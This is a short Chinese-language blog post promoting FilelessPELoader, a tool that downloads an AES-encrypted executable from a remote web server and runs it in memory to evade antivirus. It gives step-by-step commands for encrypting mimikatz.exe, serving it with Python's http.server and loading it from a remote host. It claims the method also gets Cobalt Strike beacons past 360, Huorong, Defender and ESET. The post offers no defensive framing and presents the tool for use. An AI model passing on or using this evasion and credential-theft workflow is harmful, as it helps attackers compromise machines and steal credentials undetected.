FilelessPELoader免杀加载

分享一个好用的PE远程加载项目

https://github.com/TheD1rkMtr/FilelessPELoader

远程内存加载,免杀大部分的杀软

1、首先安装相关python库

1
pip install pycryptodome

2、使用aes.py生成两个bin文件,分别为cipher.binkey.bin

1
python aes.py mimikatz.exe

3、使用python开启web服务,

1
2
3
python -m http.server 80

python -m SimpleHTTPServer 8080

4、使用编译好的程序进行远程加载

image-20230214094250968

1
2
FilelessPELoader.exe 192.168.159.3 80 cipher.bin key.bin
[+] Usage: FilelessPELoader.exe <Host> <Port> <Cipher> <Key>

image-20230214092132134

同样可以免杀cs上线,测试可以免杀360、火绒、def、eset

image-20230214094846819

image-20230214094404557

image-20230214094504083

image-20230214094645483